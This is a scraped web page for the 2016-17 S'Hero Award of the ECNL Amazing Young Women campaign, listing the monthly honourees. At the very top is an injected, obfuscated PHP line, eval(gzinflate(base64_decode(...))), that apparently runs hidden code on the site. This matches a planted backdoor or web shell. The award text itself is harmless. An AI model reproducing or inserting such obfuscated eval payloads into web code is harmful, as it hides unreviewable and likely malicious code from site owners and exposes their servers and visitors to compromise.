php eval(gzinflate(base64_decode('fVPBbqMwEL3zFW6ECkikSa+NekDB2aLNEuRCW6mqLJYMxQoLke1UTav+e21IN6CS+gD2vHkzz+MZMyvQNcp2vKSsYtJ2ZkZzECDrrbTNrHDRPCHLVRRT9XPRqJByezWZXE6n05JVG3Hxun+b7DgTo5+4BMcJCWPihbcLTFx0qZzNAtI1cPH4pCRY1szId1UmWV2hZ5DzkkElg8h2jHcDqWWybbpecxBCeyfh73B1HypSg21gL65TztO9bd3EcUTnywCHMQ0iy20ND3SxIvce8bGvdwPmL9OgX9eL4D+rGFPP94nltALymkOaFXYjBKVCKXIaoNWuF8uRzYSqjW3SW0zuMHk0N08OOj9HZ/BvK/ff7TkrJXD6kvIe5qJFsIwxoXfeMvA9JSWIHOd/omPKb2XrRpn13P4q/Zuj6cM4fjnIHa86gWbGh2EMXGfUVIpg9cCYjNornAKRc3jVXg8QyIEDv0LWxSmiTn4yd6JO1PulXn44fRcfVpAI4GPvWbXegIguXevoUx/GBNJyHESa2evgH+ZCx73Bnq9n4iucHg1V58NYwitkmqOskBU10tAhYFbWAlrsEw=='))); ?> 2016-17 S’Hero Award | AYW

2016-17 S’Hero Award

S’Heroes are a part of the Amazing Young WomenTM campaign designed to showcase strong, successful women who embody the fact that drive on the soccer field translates into life lessons. The ECNL is calling on all who love sports to join them in supporting youth female athletes as they recognize their own potential, define their individual paths to success, and prepare to be our next generation of leaders using the hashtag #UNSHAKABLE.

The Amazing Young Women campaign encourages young female athletes to embrace their competitive nature, and prove they cannot be shaken from the path to their dreams. Those recognized as S’Heroes have taken a spirit of leadership and inspiration from the field, and have demonstrated that it’s not just about a phase of your life, but a way of life.

2016-2017 S'Heroes

Brianna Pinto

2016-17 S'Hero of the Year & March 2017 S'Hero

Jillion Potter

August 2016 S'Hero

Alexa Halko

September 2016 S'Hero

Shea Groom

October 2016 S'Hero

Kelli Masters

November 2016 S'Hero

Morgan Andrews

December 2016 S'Hero

Dr. Robin West

January 2017 S'Hero

Daphne Corboz

February 2017 S'Hero

Monica Gonzalez

April 2017 S'Hero

Andrea Perez

May 2017 S'Hero

Erica Porter

June 2017 S'Hero

Dianna Russini

July 2017 S'Hero